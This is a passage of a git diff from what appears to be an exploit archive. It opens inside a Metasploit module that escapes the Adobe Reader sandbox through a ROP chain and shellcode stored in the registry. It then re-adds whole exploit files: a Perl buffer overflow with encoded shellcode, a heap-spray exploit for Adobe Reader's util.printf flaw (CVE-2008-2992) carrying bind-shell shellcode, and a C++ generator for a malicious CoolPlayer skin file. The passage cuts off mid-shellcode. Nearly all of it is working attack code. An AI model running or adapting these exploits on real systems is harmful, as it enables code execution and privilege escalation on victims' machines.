registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") - print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself") - end - if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") - print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself") - end - print_status("Cleanup finished") - end - - # Test the process integrity level by trying to create a directory on the TEMP folder - # Access should be granted with Medium Integrity Level - # Access should be denied with Low Integrity Level - # Usint this solution atm because I'm experiencing problems with railgun when trying - # use GetTokenInformation - def low_integrity_level? 
- tmp_dir = expand_path("%TEMP%") - cd(tmp_dir) - new_dir = "#{rand_text_alpha(5)}" - begin - session.shell_command_token("mkdir #{new_dir}") - rescue - return true - end - - if directory?(new_dir) - session.shell_command_token("rmdir #{new_dir}") - return false - else - return true - end - end - - def check_trigger - signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length) - if signature == target['AdobeCollabSyncTriggerSignature'] - return true - end - return false - end - - def collect_addresses - # find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe - @addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'] - vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}") - - # find kernel32.dll - kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll") - @addresses['kernel32.dll'] = kernel32["return"] - if @addresses['kernel32.dll'] == 0 - fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll") - end - vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}") - - # find kernel32.dll methods - virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc") - @addresses['VirtualAlloc'] = virtual_alloc["return"] - if @addresses['VirtualAlloc'] == 0 - fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc") - end - vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}") - - reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA") - @addresses['RegGetValueA'] = reg_get_value["return"] - if @addresses['RegGetValueA'] == 0 - fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA") - end - vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}") - - # find ntdll.dll - ntdll = 
session.railgun.kernel32.GetModuleHandleA("ntdll.dll") - @addresses['ntdll.dll'] = ntdll["return"] - if @addresses['ntdll.dll'] == 0 - fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll") - end - vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}") - end - - # Search a gadget identified by pattern on the process memory - def search_gadget(base, offset_start, offset_end, pattern) - mem = base + offset_start - length = offset_end - offset_start - mem_contents = session.railgun.memread(mem, length) - return mem_contents.index(pattern) - end - - # Search for gadgets on ntdll.dll - def search_gadgets - ntdll_text_base = 0x10000 - search_length = 0xd6000 - - @gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3") - if @gadgets['mov [edi], ecx # ret'].nil? - fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'") - end - @gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll'] - @gadgets['mov [edi], ecx # ret'] += ntdll_text_base - vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}") - - @gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2 - vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}") - - @gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3") - if @gadgets['pop edi # ret'].nil? - fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'") - end - @gadgets['pop edi # ret'] += @addresses['ntdll.dll'] - @gadgets['pop edi # ret'] += ntdll_text_base - vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}") - - @gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3") - if @gadgets['pop ecx # ret'].nil? 
- fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'") - end - @gadgets['pop ecx # ret'] += @addresses['ntdll.dll'] - @gadgets['pop ecx # ret'] += ntdll_text_base - vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}") - end - - def store(buf, data, address) - i = 0 - while (i < data.length) - buf << [@gadgets['pop edi # ret']].pack("V") - buf << [address + i].pack("V") # edi - buf << [@gadgets['pop ecx # ret']].pack("V") - buf << data[i, 4].ljust(4,"\x00") # ecx - buf << [@gadgets['mov [edi], ecx # ret']].pack("V") - i = i + 4 - end - return i - end - - def create_rop_chain - mem = 0x0c0c0c0c - - buf = [0x58000000 + 1].pack("V") - buf << [0x58000000 + 2].pack("V") - buf << [0].pack("V") - buf << [0x58000000 + 4].pack("V") - - buf << [0x58000000 + 5].pack("V") - buf << [0x58000000 + 6].pack("V") - buf << [0x58000000 + 7].pack("V") - buf << [@gadgets['ret']].pack("V") - buf << rand_text(8) - - # Allocate Memory To store the shellcode and the necessary data to read the - # shellcode stored in the registry - buf << [@addresses['VirtualAlloc']].pack("V") - buf << [@gadgets['ret']].pack("V") - buf << [mem].pack("V") # lpAddress - buf << [0x00010000].pack("V") # SIZE_T dwSize - buf << [0x00003000].pack("V") # DWORD flAllocationType - buf << [0x00000040].pack("V") # flProtect - - # Put in the allocated memory the necessary data in order to read the - # shellcode stored in the registry - # 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions - reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00" - reg_key_length = store(buf, reg_key, mem) - # 2) The reg entry: shellcode - value_key = "shellcode\x00" - store(buf, value_key, mem + reg_key_length) - # 3) The output buffer size: 0x3000 - size_buffer = 0x3000 - buf << [@gadgets['pop edi # ret']].pack("V") - buf << [mem + 0x50].pack("V") # edi - buf << [@gadgets['pop ecx # ret']].pack("V") - buf << 
[size_buffer].pack("V") # ecx - buf << [@gadgets['mov [edi], ecx # ret']].pack("V") - - # Copy the shellcode from the the registry to the - # memory allocated with executable permissions and - # ret into there - buf << [@addresses['RegGetValueA']].pack("V") - buf << [mem + 0x1000].pack("V") # ret to shellcode - buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER - buf << [mem].pack("V") # lpSubKey - buf << [mem + 0x3c].pack("V") # lpValue - buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY - buf << [0].pack("V") # pdwType - buf << [mem + 0x1000].pack("V") # pvData - buf << [mem + 0x50].pack("V") # pcbData - end - - # Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry - def store_data_registry(buf) - vprint_status("Creating the Registry Key to store the shellcode...") - - if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode") - vprint_good("Registry Key created") - else - fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode") - end - - vprint_status("Storing the shellcode in the Registry...") - - if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY") - vprint_good("Shellcode stored") - else - fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry") - end - - # Create the Malicious registry entry in order to exploit.... 
- vprint_status("Creating the Registry Key to trigger the Overflow...") - if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB") - vprint_good("Registry Key created") - else - fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow") - end - - vprint_status("Storing the trigger in the Registry...") - if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY") - vprint_good("Trigger stored") - else - fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry") - end - end - - def trigger_overflow - vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...") - # Create a thread in order to execute the necessary code to launch AdobeCollabSync - ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil) - if ret['return'] < 1 - print_error("Unable to CreateThread") - return - end - hthread = ret['return'] - - vprint_status("Resuming the Thread...") - # Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability! 
- ret = client.railgun.kernel32.ResumeThread(hthread) - if ret['return'] < 1 - fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread") - end - end - - def check - @addresses = {} - acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") - @addresses['AcroRd32.exe'] = acrord32["return"] - if @addresses['AcroRd32.exe'] == 0 - return Msf::Exploit::CheckCode::Unknown - elsif check_trigger - return Msf::Exploit::CheckCode::Vulnerable - else - return Msf::Exploit::CheckCode::Detected - end - end - - def exploit - @addresses = {} - @gadgets = {} - - print_status("Verifying we're in the correct target process...") - acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe") - @addresses['AcroRd32.exe'] = acrord32["return"] - if @addresses['AcroRd32.exe'] == 0 - fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found") - end - vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}") - - print_status("Checking the AcroRd32.exe image...") - if not check_trigger - fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target") - end - - print_status("Checking the Process Integrity Level...") - if not low_integrity_level? - fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level") - end - - print_status("Collecting necessary addresses for exploit...") - collect_addresses - - print_status("Searching the gadgets needed to build the ROP chain...") - search_gadgets - print_good("Gadgets collected...") - - print_status("Building the ROP chain...") - buf = create_rop_chain - print_good("ROP chain ready...") - - print_status("Storing the shellcode and the trigger in the Registry...") - store_data_registry(buf) - - print_status("Executing AdobeCollabSync.exe...") - trigger_overflow - end -end 
diff --git a/platforms/windows/local/6157.pl b/platforms/windows/local/6157.pl
index 25ed6a753..6ab6a90d4 100755
--- a/platforms/windows/local/6157.pl
+++ b/platforms/windows/local/6157.pl
@@ -1,27 +1,27 @@ -#!/usr/bin/perl -# k`sOSe - 07/29/2008 - -use warnings; -use strict; - -# http://www.metasploit.com -# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe -# [*] x86/shikata_ga_nai succeeded, final size 169 -my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" . - "\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" . - "\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" . - "\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" . - "\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" . - "\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" . - "\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" . - "\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" . - "\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" . - "\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" . - "\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" . - "\x1e\x28\x44\xd4"; - -print $shellcode . - "\x41" x (218 - length($shellcode)) . - "\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3 - -# milw0rm.com [2008-07-29] +#!/usr/bin/perl +# k`sOSe - 07/29/2008 + +use warnings; +use strict; + +# http://www.metasploit.com +# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe +# [*] x86/shikata_ga_nai succeeded, final size 169 +my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" . + "\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" . + "\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" . + "\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" . + "\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" . + "\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" . + "\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" . + "\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" . + "\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" . 
+ "\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" . + "\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" . + "\x1e\x28\x44\xd4"; + +print $shellcode . + "\x41" x (218 - length($shellcode)) . + "\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3 + +# milw0rm.com [2008-07-29] diff --git a/platforms/windows/local/7006.txt b/platforms/windows/local/7006.txt index 66b21d885..f5995606c 100755 --- a/platforms/windows/local/7006.txt +++ b/platforms/windows/local/7006.txt 
@@ -1,43 +1,43 @@ -Adobe Reader Javascript Printf Buffer Overflow Exploit -=========================================================== -Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow -CVE-2008-2992 - -Thanks to coresecurity for the technical background. - -6Nov,2008: Exploit released by me - -Credits: Debasis Mohanty -www.hackingspirits.com -www.coffeeandsecurity.com -=========================================================== - -//Exploit by Debasis Mohanty (aka nopsledge/Tr0y) -//www.coffeeandsecurity -//www.hackingspirits.com - - -// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com - -var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u59
47%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"); - -//Heap Spray starts here - Kiddos don't mess up with this -var nop =""; -for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090"); -heapblock = nop + payload; -bigblock = unescape("%u9090%u9090"); -headersize = 20; -spray = headersize+heapblock.length -while (bigblock.length<spray) bigblock+=bigblock; -fillblock = bigblock.substring(0, spray); -block = bigblock.substring(0, bigblock.length-spray); -while(block.length+spray < 0x40000) block = block+block+fillblock; -mem = new Array(); -for (i=0;i<1400;i++) mem[i] = block + heapblock; - -// reference snippet from core security -// http://www.coresecurity.com/content/adobe-reader-buffer-overflow -var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 -util.printf("%45000f",num); - -# milw0rm.com [2008-11-05] +Adobe Reader Javascript Printf Buffer Overflow Exploit +=========================================================== +Reference: 
http://www.coresecurity.com/content/adobe-reader-buffer-overflow +CVE-2008-2992 + +Thanks to coresecurity for the technical background. + +6Nov,2008: Exploit released by me + +Credits: Debasis Mohanty +www.hackingspirits.com +www.coffeeandsecurity.com +=========================================================== + +//Exploit by Debasis Mohanty (aka nopsledge/Tr0y) +//www.coffeeandsecurity +//www.hackingspirits.com + + +// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com + +var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%
u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350"); + +//Heap Spray starts here - Kiddos don't mess up with this +var nop =""; +for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090"); +heapblock = nop + payload; +bigblock = unescape("%u9090%u9090"); +headersize = 20; +spray = headersize+heapblock.length +while (bigblock.length<spray) bigblock+=bigblock; +fillblock = bigblock.substring(0, spray); +block = bigblock.substring(0, bigblock.length-spray); +while(block.length+spray < 0x40000) block = block+block+fillblock; +mem = new Array(); +for (i=0;i<1400;i++) mem[i] = block + heapblock; + +// reference snippet from core security +// http://www.coresecurity.com/content/adobe-reader-buffer-overflow +var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888 +util.printf("%45000f",num); + +# milw0rm.com [2008-11-05] diff --git a/platforms/windows/local/7536.cpp b/platforms/windows/local/7536.cpp index c7a170e5d..ace1a672f 100755 --- a/platforms/windows/local/7536.cpp +++ b/platforms/windows/local/7536.cpp 
@@ -1,75 +1,75 @@ -/* -* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit -* -* Advisory: http://www.bmgsec.com.au/advisory/43/ -* Test box: WinXP Pro SP2 English -* -* Code reference is in skin.c, lines 464 - 480 -* -* Written and discovered by: -* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) -*/ - -#include <iostream> -#include <fstream> -#include <cstdlib> //exit - -using namespace std; - -int main() -{ - //win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com - //Bad characters: 0x00, 0x0d, 0xf4 - char scode[] = - "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" - "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" - "\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57" - "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38" - "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48" - "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" - "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38" - "\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54" - "\x4b\x38\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x58" - "\x41\x30\x4b\x4e\x49\x48\x4e\x55\x46\x42\x46\x50\x43\x4c\x41\x43" - "\x42\x4c\x46\x36\x4b\x48\x42\x44\x42\x33\x45\x58\x42\x4c\x4a\x47" - "\x4e\x50\x4b\x48\x42\x34\x4e\x30\x4b\x38\x42\x47\x4e\x31\x4d\x4a" - "\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b" - "\x42\x50\x42\x50\x42\x30\x4b\x38\x4a\x36\x4e\x53\x4f\x35\x41\x53" - "\x48\x4f\x42\x46\x48\x45\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57" - "\x42\x45\x4a\x46\x50\x47\x4a\x4d\x44\x4e\x43\x37\x4a\x46\x4a\x39" - 
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x46" - "\x4e\x36\x43\x46\x50\x32\x45\x46\x4a\x37\x45\x46\x42\x30\x5a"; - - char buffer[1918]; - char eip[] = "\x27\x38\x03\x7d"; //jmp esp - - cout << "[*] Generating payload\n"; - strcpy(buffer, "[CoolPlayer Skin]\nPlaylistSkin="); - - int i; - for (i=0; i<1534; i++) - buffer[31+i] = 'A'; - - for (i=0; i<sizeof(eip); i++) - buffer[1565+i] = eip[i]; - - for (i=0; i<sizeof(scode); i++) - buffer[1569+i] = scode[i]; - - ofstream outStream; - outStream.open("cp.ini"); - - outStream << buffer; - - outStream.close(); - - cout << "[+] Skin file created.\n"; - - return 0; -} - -// milw0rm.com [2008-12-21] +/* +* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit +* +* Advisory: http://www.bmgsec.com.au/advisory/43/ +* Test box: WinXP Pro SP2 English +* +* Code reference is in skin.c, lines 464 - 480 +* +* Written and discovered by: +* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) +*/ + +#include <iostream> +#include <fstream> +#include <cstdlib> //exit + +using namespace std; + +int main() +{ + //win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com + //Bad characters: 0x00, 0x0d, 0xf4 + char scode[] = + "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" + "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" + "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" + "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" + "\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57" + "\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38" + "\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48" + "\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c" + "\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e" + "\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38" + 
